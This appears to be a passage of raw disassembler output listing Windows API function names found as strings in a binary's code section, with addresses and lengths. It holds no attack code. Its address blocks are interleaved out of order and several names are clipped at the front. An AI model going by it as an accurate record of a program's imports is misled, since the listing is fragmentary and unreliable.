.text:0041A0F0 00000012 C CoRevokeMallocSpy

.text:0041A104 00000014 C CoRevokeClassObject

.text:0041A118 0000000F C CoRevertToSelf

.text:0041A128 00000015 C CoResumeClassObjects

.text:0041A140 00000017 C CoReleaseServerProcess

.text:0041A158 00000015 C CoReleaseMarshalData

.text:0041A170 00000014 C CoRegisterSurrogate

.text:0041A184 00000012 C CoRegisterPSClsid

.text:0041A198 00000018 C CoRegisterMessageFilter

.text:0041A1B0 00000014 C CoRegisterMallocSpy

.text:0041A1C4 00000016 C CoRegisterClassObject

.text:0041A1DC 00000016 C CoRegisterChannelHook

.text:0041A1F4 00000015 C CoQueryReleaseObject

.text:0041A20C 00000014 C CoQueryProxyBlanket

.text:0041A220 00000015 C CoQueryClientBlanket

.text:0041A238 0000001E C CoQueryAuthenticationServices

.text:0041A258 00000013 C CoMarshalInterface

.text:0041A26C 00000026 C CoMarshalInterThreadInterfaceInStream

.text:0041A294 00000011 C CoMarshalHresult

.text:0041A2A8 00000015 C CoLockObjectExternal

.text:0041A2C0 0000000E C CoLoadLibrary

.text:0041A2D0 0000000E C CoIsOle1Class

.text:0041A2E0 00000015 C CoIsHandlerConnected

.text:0041A2F8 00000015 C CoInitializeSecurity

.text:0041A310 0000000F C CoInitializeEx

.text:0041A320 0000000D C CoInitialize

.text:0041A330 00000014 C CoImpersonateClient

.text:0041A344 00000012 C CoGetTreatAsClass

.text:0041A358 00000015 C CoGetStandardMarshal

.text:0041A370 0000000D C CoGetPSClsid

.text:0041A380 0000000C C CoGetObject

.text:0041A38C 00000014 C CoGetMarshalSizeMax

.text:0041A3A0 0000000C C CoGetMalloc

.text:0041A3AC 0000001F C CoGetInterfaceAndReleaseStream

.text:0041A3CC 0000001A C CoGetInstanceFromIStorage

.text:0041A3E8 00000016 C CoGetInstanceFromFile

.text:0041A400 00000014 C CoGetCurrentProcess

.text:0041A414 0000001C C CoGetCurrentLogicalThreadId

.text:0041A430 00000011 C CoGetClassObject

.text:0041A444 0000000F C CoGetCallerTID

.text:0041A454 00000011 C CoGetCallContext

.text:0041A468 00000016 C CoFreeUnusedLibraries

.text:0041A480 0000000E C CoFreeLibrary

.text:0041A490 00000013 C CoFreeAllLibraries

.text:0041A4A4 00000018 C CoFileTimeToDosDateTime

.text:0041A4BC 0000000E C CoFileTimeNow

.text:0041A4CC 00000018 C CoDosDateTimeToFileTime

.text:0041A4E4 00000013 C CoDisconnectObject

.text:0041A4F8 00000013 C CoCreateInstanceEx

.text:0041A50C 00000011 C CoCreateInstance

.text:0041A520 0000000D C CoCreateGuid

.text:0041A530 0000001E C CoCreateFreeThreadedMarshaler

.text:0041A550 0000000C C CoCopyProxy

.text:0041A55C 0000000F C CoBuildVersion

.text:0041A56C 00000016 C CoAddRefServerProcess

.text:0041A584 00000010 C CLSIDFromString

.text:0041A594 00000010 C CLSIDFromProgID

.text:0041A5A4 0000000C C BindMoniker

.text:0041A5B0 00000010 C WindowFromPoint

.text:0041A5C0 0000000D C WindowFromDC

.text:0041A5D0 00000009 C WinHelpW

.text:0041A5DC 00000009 C WinHelpA

.text:0041A5E8 0000000C C WaitMessage

.text:0041F698 00000013 C PathCreateFromUrlA

.text:0041F6AC 00000011 C PathCompactPathW

.text:0041F6C0 00000013 C PathCompactPathExW

.text:0041F6D4 00000013 C PathCompactPathExA

.text:0041F6E8 00000011 C PathCompactPathA

.text:0041F6FC 00000012 C PathCommonPrefixW

.text:0041F710 00000012 C PathCommonPrefixA

.text:0041F724 0000000D C PathCombineW

.text:0041F734 0000000D C PathCombineA

.text:0041F744 00000012 C PathCanonicalizeW

.text:0041F758 00000012 C PathCanonicalizeA

.text:0041F76C 0000000F C PathBuildRootW

.text:0041F77C 0000000F C PathBuildRootA

.text:0041F78C 0000000C C PathAppendW

.text:0041F798 0000000C C PathAppendA

.text:0041F7A4 00000012 C PathAddExtensionW

.text:0041F7B8 00000012 C PathAddExtensionA

.text:0041F7CC 00000012 C PathAddBackslashW

.text:0041F7E0 00000012 C PathAddBackslashA

.text:0041F7F4 00000011 C IntlStrEqWorkerW

.text:0041F808 00000011 C IntlStrEqWorkerA

.text:0041F81C 00000009 C HashData

.text:0041F828 00000011 C GetMenuPosFromID

.text:0041F83C 0000000E C ColorRGBToHLS

.text:0041F84C 0000000E C ColorHLSToRGB

.text:0041F85C 00000010 C ColorAdjustLuma

.text:0041F86C 00000009 C ChrCmpIW

.text:0041F878 00000009 C ChrCmpIA

.text:0041F884 00000012 C AssocQueryStringW

.text:0041F898 00000017 C AssocQueryStringByKeyW

.text:0041F8B0 00000017 C AssocQueryStringByKeyA

.text:0041F8C8 00000012 C AssocQueryStringA

.text:0041F8DC 0000000F C AssocQueryKeyW

.text:0041F8EC 0000000F C AssocQueryKeyA

.text:0041F8FC 00000009 C lstrlenW

.text:0041F908 00000009 C lstrlenA

.text:0041F914 00000008 C lstrlen

.text:0041F91C 0000000A C lstrcpynW

.text:0041F928 0000000A C lstrcpynA

.text:0041F934 00000009 C lstrcpyn

.text:0041F940 00000009 C lstrcpyW

.text:0041F94C 00000009 C lstrcpyA

.text:0041F958 00000008 C lstrcpy

.text:0041F960 0000000A C lstrcmpiW

.text:0041F96C 0000000A C lstrcmpiA

.text:0041F978 00000009 C lstrcmpi

.text:0041F984 00000009 C lstrcmpW

.text:0041F990 00000009 C lstrcmpA

.text:0041F99C 00000008 C lstrcmp

.text:0041F9A4 00000009 C lstrcatW

.text:0041F9B0 00000009 C lstrcatA

.text:0041F9BC 00000008 C lstrcat

.text:0041F9C4 0000000E C WriteTapemark

.text:0041F9D4 00000014 C WriteProfileStringW

.text:0041F9E8 00000014 C WriteProfileStringA

.text:0041F9FC 00000015 C WriteProfileSectionW

.text:0041FA14 00000015 C WriteProfileSectionA

.text:0041FA2C 00000013 C WriteProcessMemory

.text:0041FA40 0000001B C WritePrivateProfileStructW

.text:0041FA5C 0000001B C WritePrivateProfileStructA

.text:0041FA78 0000001B C WritePrivateProfileStringW

.text:0041FA94 0000001B C WritePrivateProfileStringA

.text:0041FAB0 0000001C C WritePrivateProfileSectionW

.text:0041FACC 0000001C C WritePrivateProfileSectionA

.text:0041FAE8 00000010 C WriteFileGather

.text:0041FAF8 0000000C C WriteFileEx

.text:0041FB04 0000000A C WriteFile

.text:0041FB10 0000000E C WriteConsoleW

.text:0041FB20 00000014 C WriteConsoleOutputW

.text:0041FB34 0000001D C WriteConsoleOutputCharacterW

.text:0041A5F4 00000011 C WaitForInputIdle

.text:0041A608 00000013 C WINNLSGetIMEHotkey

.text:0041A61C 00000016 C WINNLSGetEnableStatus

.text:0041A634 00000010 C WINNLSEnableIME

.text:0041A644 0000000B C VkKeyScanW

.text:0041A650 0000000D C VkKeyScanExW

.text:0041A660 0000000D C VkKeyScanExA

.text:0041A670 0000000B C VkKeyScanA

.text:0041A67C 0000000C C ValidateRgn

.text:0041A688 0000000D C ValidateRect

.text:0041A698 0000000D C UpdateWindow

.text:0041A6A8 00000011 C UnregisterHotKey

.text:0041A6BC 0000001D C UnregisterDeviceNotification

.text:0041A6DC 00000011 C UnregisterClassW

.text:0041A6F0 00000011 C UnregisterClassA

.text:0041A704 00000010 C UnpackDDElParam

.text:0041A714 00000015 C UnloadKeyboardLayout

.text:0041A72C 0000000A C UnionRect

.text:0041A738 00000014 C UnhookWindowsHookEx

.text:0041A74C 00000012 C UnhookWindowsHook

.text:0041A760 0000000F C UnhookWinEvent

.text:0041A770 00000011 C TranslateMessage

.text:0041A784 00000015 C TranslateMDISysAccel

.text:0041A79C 00000016 C TranslateAcceleratorW

.text:0041A7B4 00000016 C TranslateAcceleratorA

.text:0041A7CC 00000015 C TranslateAccelerator

.text:0041A7E4 00000011 C TrackPopupMenuEx

.text:0041A7F8 0000000F C TrackPopupMenu

.text:0041A808 00000010 C TrackMouseEvent

.text:0041A818 0000000C C ToUnicodeEx

.text:0041A824 0000000A C ToUnicode

.text:0041A830 0000000A C ToAsciiEx

.text:0041A83C 00000008 C ToAscii

.text:0041A844 0000000C C TileWindows

.text:0041A850 00000011 C TileChildWindows

.text:0041A864 0000000F C TabbedTextOutW

.text:0041A874 0000000F C TabbedTextOutA

.text:0041A884 00000016 C SystemParametersInfoW

.text:0041A89C 00000016 C SystemParametersInfoA

.text:0041A8B4 00000013 C SwitchToThisWindow

.text:0041A8C8 0000000E C SwitchDesktop

.text:0041A8D8 00000010 C SwapMouseButton

.text:0041A8E8 0000000D C SubtractRect

.text:0041A8F8 00000010 C ShowWindowAsync

.text:0041A908 0000000B C ShowWindow

.text:0041A914 0000000E C ShowScrollBar

.text:0041A925 0000000F C howOwnedPopups

.text:0041A934 0000000B C ShowCursor

.text:0041A940 0000000A C ShowCaret

.text:0041A94C 00000010 C SetWindowsHookW

.text:0041A95C 00000012 C SetWindowsHookExW

.text:0041A970 00000012 C SetWindowsHookExA

.text:0041A984 00000010 C SetWindowsHookA

.text:0041A994 0000000E C SetWindowWord

.text:0041A9A4 0000000F C SetWindowTextW

.text:0041A9B4 0000000F C SetWindowTextA

.text:0041A9C4 0000000D C SetWindowRgn

.text:0041A9D4 0000000D C SetWindowPos

.text:0041A9E4 00000013 C SetWindowPlacement

.text:0041A9F8 0000000F C SetWindowLongW

.text:0041AA08 0000000F C SetWindowLongA

.text:0041AA18 00000017 C SetWindowContextHelpId

.text:0041AA30 00000010 C SetWinEventHook

.text:0041AA40 00000016 C SetUserObjectSecurity

.text:0041AA58 0000001A C SetUserObjectInformationW

.text:0041AA74 0000001A C SetUserObjectInformationA

.text:0041AA90 00000009 C SetTimer

.text:0041AA9C 00000011 C SetThreadDesktop

.text:0041AAB0 00000010 C SetSystemCursor

.text:0041AAC0 0000000D C SetSysColors

.text:0041FB54 0000001D C WriteConsoleOutputCharacterA

.text:0041FB74 0000001C C WriteConsoleOutputAttribute

.text:0041FB90 00000014 C WriteConsoleOutputA

.text:0041FBA4 00000013 C WriteConsoleInputW

.text:0041FBB8 00000013 C WriteConsoleInputA

.text:0041FBCC 0000000E C WriteConsoleA

.text:0041FBDC 00000008 C WinExec

.text:0041FBE4 00000014 C WideCharToMultiByte

.text:0041FBF8 0000000F C WaitNamedPipeW

.text:0041FC08 0000000F C WaitNamedPipeA

.text:0041FC18 00000016 C WaitForSingleObjectEx

.text:0041FC30 00000014 C WaitForSingleObject

.text:0041FC44 00000019 C WaitForMultipleObjectsEx

.text:0041FC60 00000017 C WaitForMultipleObjects

.text:0041FC78 00000012 C WaitForDebugEvent

.text:0041FC8C 0000000E C WaitCommEvent

.text:0041FC9C 0000000E C VirtualUnlock

.text:0041FCAC 0000000F C VirtualQueryEx

.text:0041FCBC 0000000D C VirtualQuery

.text:0041FCCC 00000011 C VirtualProtectEx

.text:0041FCE0 0000000F C VirtualProtect

.text:0041FCF0 0000000C C VirtualLock

.text:0041FCFC 0000000E C VirtualFreeEx

.text:0041FD0C 0000000C C VirtualFree

.text:0041FD18 0000000F C VirtualAllocEx

.text:0041FD28 0000000D C VirtualAlloc

.text:0041FD38 00000011 C VerLanguageNameW

.text:0041FD4C 00000011 C VerLanguageNameA

.text:0041FD60 00000010 C UpdateResourceW

.text:0041FD70 00000010 C UpdateResourceA

.text:0041FD80 00000010 C UnmapViewOfFile

.text:0041FD90 0000000D C UnlockFileEx

.text:0041FDA0 0000000B C UnlockFile

.text:0041FDAC 00000019 C UnhandledExceptionFilter

.text:0041FDC8 00000011 C TransmitCommChar

.text:0041FDDC 00000012 C TransactNamedPipe

.text:0041FDF0 0000001C C Toolhelp32ReadProcessMemory

.text:0041FE0C 0000000C C TlsSetValue

.text:0041FE18 0000000C C TlsGetValue

.text:0041FE24 00000008 C TlsFree

.text:0041FE2C 00000009 C TlsAlloc

.text:0041FE38 0000000D C Thread32Next

.text:0041FE48 0000000E C Thread32First

.text:0041FE58 00000010 C TerminateThread

.text:0041FE68 00000011 C TerminateProcess

.text:0041FE7C 00000020 C SystemTimeToTzSpecificLocalTime

.text:0041FE9C 00000015 C SystemTimeToFileTime

.text:0041FEB4 0000000F C SwitchToThread

.text:0041FEC4 0000000E C SwitchToFiber

.text:0041FED4 0000000E C SuspendThread

.text:0041FEE4 00000008 C SleepEx

.text:0041FEEC 00000006 C Sleep

.text:0041FEF4 0000000F C SizeofResource

.text:0041FF04 00000014 C SignalObjectAndWait

.text:0041FF18 0000000A C SetupComm

.text:0041FF24 00000011 C SetWaitableTimer

.text:0041FF38 00000010 C SetVolumeLabelW

.text:0041FF48 00000010 C SetVolumeLabelA

.text:0041FF58 0000001C C SetUnhandledExceptionFilter

.text:0041FF74 00000017 C SetTimeZoneInformation

.text:0041FF8C 00000017 C SetThreadPriorityBoost

.text:0041FFA4 00000012 C SetThreadPriority

.text:0041FFB8 00000010 C SetThreadLocale

.text:0041FFC8 00000018 C SetThreadIdealProcessor

.text:0041FFE0 00000018 C SetThreadExecutionState

.text:0041FFF8 00000011 C SetThreadContext

.text:0042000C 00000016 C SetThreadAffinityMask

.text:00420024 00000010 C SetTapePosition

.text:00420034 00000012 C SetTapeParameters

.text:00420048 00000018 C SetSystemTimeAdjustment

.text:0041AAD0 0000000F C SetShellWindow

.text:0041AAE0 0000000F C SetScrollRange

.text:0041AAF1 0000000C C etScrollPos

.text:0041AB00 0000000E C SetScrollInfo

.text:0041AB10 0000000D C SetRectEmpty

.text:0041AB20 00000008 C SetRect

.text:0041AB28 00000009 C SetPropW

.text:0041AB34 00000009 C SetPropA

.text:0041AB40 00000018 C SetProcessWindowStation

.text:0041AB59 00000017 C etProcessDefaultLayout

.text:0041AB70 0000000A C SetParent

.text:0041AB7C 00000010 C SetMessageQueue

.text:0041AB8C 00000014 C SetMessageExtraInfo

.text:0041ABA0 00000011 C SetMenuItemInfoW

.text:0041ABB5 00000010 C etMenuItemInfoA

.text:0041ABC8 00000013 C SetMenuItemBitmaps

.text:0041ABDC 0000000C C SetMenuInfo

.text:0041ABE8 00000013 C SetMenuDefaultItem

.text:0041ABFC 00000015 C SetMenuContextHelpId

.text:0041AC14 00000008 C SetMenu

.text:0041AC1C 0000000F C SetLastErrorEx

.text:0041AC2C 00000011 C SetKeyboardState

.text:0041AC40 00000014 C SetForegroundWindow

.text:0041AC54 00000009 C SetFocus

.text:0041AC60 00000013 C SetDoubleClickTime

.text:0041AC74 00000010 C SetDlgItemTextW

.text:0041AC84 00000010 C SetDlgItemTextA

.text:0041AC94 0000000E C SetDlgItemInt

.text:0041ACA4 00000011 C SetDeskWallpaper

.text:0041ACB8 00000013 C SetDebugErrorLevel

.text:0041ACCC 0000000D C SetCursorPos

.text:0041ACDC 0000000A C SetCursor

.text:0041ACE8 00000013 C SetClipboardViewer

.text:0041ACFC 00000011 C SetClipboardData

.text:0041AD10 0000000D C SetClassWord

.text:0041AD20 0000000E C SetClassLongW

.text:0041AD30 0000000E C SetClassLongA

.text:0041AD40 0000000C C SetCaretPos

.text:0041AD4C 00000012 C SetCaretBlinkTime

.text:0041AD60 0000000B C SetCapture

.text:0041AD6C 00000010 C SetActiveWindow

.text:0041AD7C 00000013 C SendNotifyMessageW

.text:0041AD90 00000013 C SendNotifyMessageA

.text:0041ADA4 0000000D C SendMessageW

.text:0041ADB4 00000014 C SendMessageTimeoutW

.text:0041ADC8 00000014 C SendMessageTimeoutA

.text:0041ADDC 00000015 C SendMessageCallbackW

.text:0041ADF4 00000015 C SendMessageCallbackA

.text:0041AE0C 0000000D C SendMessageA

.text:0041AE1C 0000000A C SendInput

.text:0041AE28 00000012 C SendIMEMessageExW

.text:0041AE3C 00000012 C SendIMEMessageExA

.text:0041AE50 00000014 C SendDlgItemMessageW

.text:0041AE64 00000014 C SendDlgItemMessageA

.text:0041AE78 0000000F C ScrollWindowEx

.text:0041AE88 0000000D C ScrollWindow

.text:0041AE98 00000009 C ScrollDC

.text:0041AEA4 0000000F C ScreenToClient

.text:0041AEB4 0000000F C ReuseDDElParam

.text:0041AEC4 0000000D C ReplyMessage

.text:0041AED4 0000000C C RemovePropW

.text:0041AEE0 0000000C C RemovePropA

.text:0041AEEC 0000000B C RemoveMenu

.text:0041AEF8 0000000A C ReleaseDC

.text:0041AF04 0000000F C ReleaseCapture

.text:0041AF14 00000017 C RegisterWindowMessageW

.text:0041AF2C 00000017 C RegisterWindowMessageA

.text:0041AF44 0000000F C RegisterHotKey

.text:0041AF54 0000001C C RegisterDeviceNotificationW

.text:0041AF70 0000001C C RegisterDeviceNotificationA

.text:00420060 0000000E C SetSystemTime

.text:00420070 00000014 C SetSystemPowerState

.text:00420084 0000000D C SetStdHandle

.text:00420094 00000019 C SetProcessWorkingSetSize

.text:004200B0 0000001D C SetProcessShutdownParameters

.text:004200D0 00000018 C SetProcessPriorityBoost

.text:004200E8 00000017 C SetProcessAffinityMask

.text:00420100 00000011 C SetPriorityClass

.text:00420114 00000018 C SetNamedPipeHandleState

.text:0042012C 0000001B C SetMessageWaitingIndicator

.text:00420148 00000010 C SetMailslotInfo

.text:00420158 0000000F C SetLocaleInfoW

.text:00420168 0000000F C SetLocaleInfoA

.text:00420178 0000000D C SetLocalTime

.text:00420188 0000000D C SetLastError

.text:00420198 00000015 C SetHandleInformation

.text:004201B0 0000000F C SetHandleCount

.text:004201C0 0000000C C SetFileTime

.text:004201CC 0000000F C SetFilePointer

.text:004201DC 00000013 C SetFileAttributesW

.text:004201F0 00000013 C SetFileAttributesA

.text:00420204 00000011 C SetFileApisToOEM

.text:00420218 00000012 C SetFileApisToANSI

.text:0042022C 00000009 C SetEvent

.text:00420238 0000000D C SetErrorMode

.text:00420248 00000018 C SetEnvironmentVariableW

.text:00420260 00000018 C SetEnvironmentVariableA

.text:00420278 0000000D C SetEndOfFile

.text:00420288 00000016 C SetDefaultCommConfigW

.text:004202A0 00000016 C SetDefaultCommConfigA

.text:004202B8 00000015 C SetCurrentDirectoryW

.text:004202D0 00000015 C SetCurrentDirectoryA

.text:004202E8 00000015 C SetConsoleWindowInfo

.text:00420300 00000011 C SetConsoleTitleW

.text:00420314 00000011 C SetConsoleTitleA

.text:00420328 00000018 C SetConsoleTextAttribute

.text:00420340 0000001B C SetConsoleScreenBufferSize

.text:0042035D 00000012 C etConsoleOutputCP

.text:00420370 0000000F C SetConsoleMode

.text:00420380 00000019 C SetConsoleCursorPosition

.text:0042039C 00000015 C SetConsoleCursorInfo

.text:004203B4 00000016 C SetConsoleCtrlHandler

.text:004203CC 0000000D C SetConsoleCP

.text:004203DC 0000001D C SetConsoleActiveScreenBuffer

.text:004203FD 00000010 C etComputerNameW

.text:00420410 00000011 C SetComputerNameA

.text:00420424 00000010 C SetCommTimeouts

.text:00420434 0000000D C SetCommState

.text:00420444 0000000C C SetCommMask

.text:00420450 0000000E C SetCommConfig

.text:00420461 0000000C C etCommBreak

.text:00420470 00000011 C SetCalendarInfoW

.text:00420484 00000011 C SetCalendarInfoA

.text:00420498 0000000C C SearchPathW

.text:004204A4 0000000C C SearchPathA

.text:004204B0 0000001B C ScrollConsoleScreenBufferW

.text:004204CD 0000001A C crollConsoleScreenBufferA

.text:004204E8 0000000E C RtlFillMemory

.text:004204F8 0000000D C ResumeThread

.text:00420508 00000010 C ResetWriteWatch

.text:00420518 0000000B C ResetEvent

.text:00420524 00000015 C RequestWakeupLatency

.text:0042053C 00000014 C RequestDeviceWakeup

.text:00420550 00000011 C RemoveDirectoryW

.text:00420564 00000011 C RemoveDirectoryA

.text:00420578 00000011 C ReleaseSemaphore

.text:0042058C 0000000D C ReleaseMutex

.text:0042059C 00000012 C ReadProcessMemory

.text:004205B0 00000010 C ReadFileScatter

.text:004205C0 0000000B C ReadFileEx

.text:0041AF8C 00000019 C RegisterClipboardFormatW

.text:0041AFA8 00000019 C RegisterClipboardFormatA

.text:0041AFC4 0000000F C RegisterClassW

.text:0041AFD4 00000011 C RegisterClassExW

.text:0041AFE8 00000011 C RegisterClassExA

.text:0041AFFC 0000000F C RegisterClassA

.text:0041B00C 0000000D C RedrawWindow

.text:0041B01C 00000013 C RealGetWindowClass

.text:0041B030 00000019 C RealChildWindowFromPoint

.text:0041B04C 00000009 C PtInRect

.text:0041B058 00000013 C PostThreadMessageW

.text:0041B06C 00000013 C PostThreadMessageA

.text:0041B080 00000010 C PostQuitMessage

.text:0041B090 0000000D C PostMessageW

.text:0041B0A0 0000000D C PostMessageA

.text:0041B0B0 0000000D C PeekMessageW

.text:0041B0C0 0000000D C PeekMessageA

.text:0041B0D0 0000000D C PaintDesktop

.text:0041B0E0 0000000E C PackDDElParam

.text:0041B0F0 00000013 C OpenWindowStationW

.text:0041B104 00000013 C OpenWindowStationA

.text:0041B118 00000011 C OpenInputDesktop

.text:0041B12C 00000009 C OpenIcon

.text:0041B138 0000000D C OpenDesktopW

.text:0041B148 0000000D C OpenDesktopA

.text:0041B158 0000000E C OpenClipboard

.text:0041B168 0000000B C OffsetRect

.text:0041B174 0000000B C OemToCharW

.text:0041B180 0000000F C OemToCharBuffW

.text:0041B190 0000000F C OemToCharBuffA

.text:0041B1A0 0000000B C OemToCharA

.text:0041B1AC 0000000B C OemKeyScan

.text:0041B1B8 0000000F C NotifyWinEvent

.text:0041B1C8 0000001C C MsgWaitForMultipleObjectsEx

.text:0041B1E4 0000001A C MsgWaitForMultipleObjects

.text:0041B200 0000000B C MoveWindow

.text:0041B20C 00000012 C MonitorFromWindow

.text:0041B220 00000010 C MonitorFromRect

.text:0041B230 00000011 C MonitorFromPoint

.text:0041B244 0000000C C ModifyMenuW

.text:0041B250 0000000C C ModifyMenuA

.text:0041B25C 0000000C C MessageBoxW

.text:0041B268 00000014 C MessageBoxIndirectW

.text:0041B27C 00000014 C MessageBoxIndirectA

.text:0041B290 0000000E C MessageBoxExW

.text:0041B2A0 0000000E C MessageBoxExA

.text:0041B2B0 0000000C C MessageBoxA

.text:0041B2BC 0000000C C MessageBeep

.text:0041B2C8 00000012 C MenuItemFromPoint

.text:0041B2DC 00000010 C MapWindowPoints

.text:0041B2EC 0000000F C MapVirtualKeyW

.text:0041B2FC 00000011 C MapVirtualKeyExW

.text:0041B310 00000011 C MapVirtualKeyExA

.text:0041B324 0000000F C MapVirtualKeyA

.text:0041B334 0000000E C MapDialogRect

.text:0041B344 0000001C C LookupIconIdFromDirectoryEx

.text:0041B360 0000001A C LookupIconIdFromDirectory

.text:0041B37C 00000011 C LockWindowUpdate

.text:0041B390 0000000C C LoadStringW

.text:0041B39C 0000000C C LoadStringA

.text:0041B3A8 0000000A C LoadMenuW

.text:0041B3B4 00000012 C LoadMenuIndirectW

.text:0041B3C8 00000012 C LoadMenuIndirectA

.text:0041B3DC 0000000A C LoadMenuA

.text:0041B3E8 00000014 C LoadKeyboardLayoutW

.text:0041B3FC 00000014 C LoadKeyboardLayoutA

.text:0041B410 0000000B C LoadImageW

.text:0041B41C 0000000B C LoadImageA

.text:0041B428 0000000A C LoadIconW

.text:0041B434 0000000A C LoadIconA

.text:004205CC 00000009 C ReadFile

.text:004205D8 00000016 C ReadDirectoryChangesW

.text:004205F0 0000000D C ReadConsoleW

.text:00420600 00000013 C ReadConsoleOutputW

.text:00420614 0000001C C ReadConsoleOutputCharacterW

.text:00420630 0000001C C ReadConsoleOutputCharacterA

.text:0042064C 0000001B C ReadConsoleOutputAttribute

.text:00420668 00000013 C ReadConsoleOutputA

.text:0042067C 00000012 C ReadConsoleInputW

.text:00420690 00000012 C ReadConsoleInputA

.text:004206A4 0000000D C ReadConsoleA

.text:004206B4 0000000F C RaiseException

.text:004206C4 0000000D C QueueUserAPC

.text:004206D4 0000001A C QueryPerformanceFrequency

.text:004206F0 00000018 C QueryPerformanceCounter

.text:00420708 00000010 C QueryDosDeviceW

.text:00420718 00000010 C QueryDosDeviceA

.text:00420728 0000000A C PurgeComm

.text:00420734 0000000B C PulseEvent

.text:00420740 0000000E C Process32Next

.text:00420750 0000000F C Process32First

.text:00420760 0000000C C PrepareTape

.text:0042076C 0000001B C PostQueuedCompletionStatus

.text:00420788 0000000E C PeekNamedPipe

.text:00420798 00000012 C PeekConsoleInputW

.text:004207AC 00000012 C PeekConsoleInputA

.text:004207C0 00000013 C OutputDebugStringW

.text:004207D4 00000013 C OutputDebugStringA

.text:004207E8 00000013 C OpenWaitableTimerW

.text:004207FC 00000013 C OpenWaitableTimerA

.text:00420810 0000000F C OpenSemaphoreW

.text:00420820 0000000F C OpenSemaphoreA

.text:00420830 0000000C C OpenProcess

.text:0042083C 0000000B C OpenMutexW

.text:00420848 0000000B C OpenMutexA

.text:00420854 00000011 C OpenFileMappingW

.text:00420868 00000011 C OpenFileMappingA

.text:0042087C 00000009 C OpenFile

.text:00420888 0000000B C OpenEventW

.text:00420894 0000000B C OpenEventA

.text:004208A0 00000014 C MultiByteToWideChar

.text:004208B4 00000007 C MulDiv

.text:004208BC 0000000A C MoveFileW

.text:004208C8 0000000C C MoveFileExW

.text:004208D4 0000000C C MoveFileExA

.text:004208E0 0000000A C MoveFileA

.text:004208EC 0000000D C Module32Next

.text:004208FC 0000000E C Module32First

.text:0042090C 00000010 C MapViewOfFileEx

.text:0042091C 0000000E C MapViewOfFile

.text:0042092C 0000000D C LockResource

.text:0042093C 0000000B C LockFileEx

.text:00420948 00000009 C LockFile

.text:00420954 0000000C C LocalUnlock

.text:00420960 0000000A C LocalSize

.text:0042096C 0000000C C LocalShrink

.text:00420978 0000000D C LocalReAlloc

.text:00420988 0000000A C LocalLock

.text:00420994 0000000C C LocalHandle

.text:004209A0 0000000A C LocalFree

.text:004209AC 0000000B C LocalFlags

.text:004209B8 00000018 C LocalFileTimeToFileTime

.text:004209D0 0000000D C LocalCompact

.text:004209E0 0000000B C LocalAlloc

.text:004209EC 0000000D C LoadResource

.text:004209FC 0000000B C LoadModule

.text:00420A08 0000000D C LoadLibraryW

.text:00420A18 0000000F C LoadLibraryExW

.text:00420A28 0000000F C LoadLibraryExA

.text:00420A38 0000000D C LoadLibraryA

.text:0041B440 0000000C C LoadCursorW

.text:0041B44C 00000014 C LoadCursorFromFileW

.text:0041B460 00000014 C LoadCursorFromFileA

.text:0041B474 0000000C C LoadCursorA

.text:0041B480 0000000C C LoadBitmapW

.text:0041B48C 0000000C C LoadBitmapA

.text:0041B498 00000012 C LoadAcceleratorsW

.text:0041B4AC 00000012 C LoadAcceleratorsA

.text:0041B4C0 0000000A C KillTimer

.text:0041B4CC 00000009 C IsZoomed

.text:0041B4D8 00000010 C IsWindowVisible

.text:0041B4E8 00000010 C IsWindowUnicode

.text:0041B4F8 00000010 C IsWindowEnabled

.text:0041B508 00000009 C IsWindow

.text:0041B514 0000000C C IsRectEmpty

.text:0041B520 00000007 C IsMenu

.text:0041B528 00000009 C IsIconic

.text:0041B534 00000013 C IsDlgButtonChecked

.text:0041B548 00000011 C IsDialogMessageW

.text:0041B55C 00000011 C IsDialogMessageA

.text:0041B570 00000010 C IsDialogMessage

.text:0041B580 0000001B C IsClipboardFormatAvailable

.text:0041B59C 00000008 C IsChild

.text:0041B5A4 0000000D C IsCharUpperW

.text:0041B5B4 0000000D C IsCharUpperA

.text:0041B5C4 0000000D C IsCharLowerW

.text:0041B5D4 0000000D C IsCharLowerA

.text:0041B5E4 0000000D C IsCharAlphaW

.text:0041B5F4 00000014 C IsCharAlphaNumericW

.text:0041B608 00000014 C IsCharAlphaNumericA

.text:0041B61C 0000000D C IsCharAlphaA

.text:0041B62C 0000000B C InvertRect

.text:0041B638 0000000E C InvalidateRgn

.text:0041B648 0000000F C InvalidateRect

.text:0041B658 0000000E C IntersectRect

.text:0041B668 00000016 C InternalGetWindowText

.text:0041B680 0000000C C InsertMenuW

.text:0041B68C 00000010 C InsertMenuItemW

.text:0041B69C 00000010 C InsertMenuItemA

.text:0041B6AC 0000000C C InsertMenuA

.text:0041B6B8 0000000C C InflateRect

.text:0041B6C4 00000010 C InSendMessageEx

.text:0041B6D4 0000000E C InSendMessage

.text:0041B6E4 0000001B C ImpersonateDdeClientWindow

.text:0041B700 0000000F C HiliteMenuItem

.text:0041B710 0000000A C HideCaret

.text:0041B71C 0000000C C GrayStringW

.text:0041B728 0000000C C GrayStringA

.text:0041B734 0000000E C GetWindowWord

.text:0041B744 00000019 C GetWindowThreadProcessId

.text:0041B760 0000000F C GetWindowTextW

.text:0041B770 00000015 C GetWindowTextLengthW

.text:0041B788 00000015 C GetWindowTextLengthA

.text:0041B7A0 0000000F C GetWindowTextA

.text:0041B7B0 0000000D C GetWindowRgn

.text:0041B7C0 0000000E C GetWindowRect

.text:0041B7D0 00000013 C GetWindowPlacement

.text:0041B7E4 00000019 C GetWindowModuleFileNameW

.text:0041B800 00000019 C GetWindowModuleFileNameA

.text:0041B81C 0000000F C GetWindowLongW

.text:0041B82C 0000000F C GetWindowLongA

.text:0041B83C 0000000E C GetWindowInfo

.text:0041B84C 0000000C C GetWindowDC

.text:0041B858 00000017 C GetWindowContextHelpId

.text:0041B870 0000000A C GetWindow

.text:0041B87C 00000016 C GetUserObjectSecurity

.text:0041B894 0000001A C GetUserObjectInformationW

.text:0041B8B0 0000001A C GetUserObjectInformationA

.text:0041B8CC 0000000D C GetUpdateRgn

.text:0041B8DC 0000000E C GetUpdateRect

.text:00420A48 0000000D C LCMapStringW

.text:00420A58 0000000D C LCMapStringA

.text:00420A68 0000000E C IsValidLocale

.text:00420A78 00000010 C IsValidCodePage

.text:00420A88 00000018 C IsSystemResumeAutomatic

.text:00420AA0 0000001A C IsProcessorFeaturePresent

.text:00420ABC 00000012 C IsDebuggerPresent

.text:00420AD0 00000011 C IsDBCSLeadByteEx

.text:00420AE4 0000000F C IsDBCSLeadByte

.text:00420AF4 0000000E C IsBadWritePtr

.text:00420B04 00000010 C IsBadStringPtrW

.text:00420B14 00000010 C IsBadStringPtrA

.text:00420B24 0000000D C IsBadReadPtr

